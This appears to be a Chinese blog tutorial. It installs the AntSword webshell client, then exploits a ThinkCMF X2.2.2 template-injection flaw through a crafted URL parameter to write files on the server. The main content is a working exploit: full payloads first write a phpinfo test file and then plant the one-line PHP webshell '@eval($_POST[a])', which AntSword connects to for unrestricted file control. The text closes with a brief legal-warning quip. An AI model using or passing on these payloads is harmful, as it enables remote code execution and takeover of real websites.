一、蚁剑如何安装

蚁剑安装分两个步骤一个是下载源代码,还有一个加载器,用加载器去加载源代码,下载的的文件路径一定要记得
蚁剑源码下载:https://github.com/AntSwordProject/antSword

在这里插入图片描述

蚁剑加载器下载:https://github.com/AntSwordProject/AntSword-Loader

在这里插入图片描述

下载之后解压缩之后是这样的

在这里插入图片描述

点击AntSword-Loader-v4.0.3-win32-x64这个文件打开AntSword.exe

在这里插入图片描述

点击初始化

在这里插入图片描述

点击初始化点击选择antSword-2.0.3
antSword-2.0.3文件夹是代码(源码)的文件夹

在这里插入图片描述

之后再打开AntSword.exe

在这里插入图片描述
在这里插入图片描述

打开以后是这样的

在这里插入图片描述

二、构造payload上传文件

我这里使用的是ThinkCMF X2.2.2框架搭建的网站,等下用这个网站测试一下。

我这里是根据https://www.cnblogs.com/0daybug/p/11790619.html
这个网站写的漏洞测试的

先用这句代码测试一下网站

?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)
在这里插入图片描述

点击回车

在这里插入图片描述

如果什么都没有显示说明上传成功.

在这里插入图片描述

分析一下上传的代码
?a=fetch&templateFile=public/index&prefix=''&content<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

这里我们主要看一下后半句

file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)

file_put_contents

这个函数的主要意思是上传并且写入代码
这句代码有两个参数
第一个参数用单引号括着表示文件名字,所以我们上面上传的文件名是test.php
第二个参数就是想要吸入的代码这里是phpinfo()

现在测试一下上传的代码是否能执行。

在网址后面输入刚刚上传的文件夹名就可以访问,我这里是test.php
在这里插入图片描述

三、上传一句话木马文件

这里我构造的代码是

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('x.php','<?php @eval($_POST[a]); ?>')</php>

这里注意里面的a参数不要加单引号,因为前面有单引号,不然就闭合的单引号会报错。

这里的说一下后半句代码

file_put_contents(‘x.php’,’<?php @eval($_POST[a]); ?>’)
这里x.php是上传的文件名

<?php @eval($_POST[a]); ?>这一句@表示抑制错误,eval是执行函数,POST代表的是传参的意思

接下来上传代码

在这里复制上面构造的代码敲回车。
在这里插入图片描述
这里空白,说明上传成功了

在这里插入图片描述

四、蚁剑连接

这里是网站首页地址加一个/后面跟着文件名
列如:http://192.168.36.35:8002/x.php

在这里插入图片描述

点击添加

在这里插入图片描述

点击文件管理

在这里插入图片描述

接下来就可以对网站里的文件随意改动。

在这里插入图片描述

从入门到入狱:网络安全法

在这里插入图片描述

Logo

旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。

更多推荐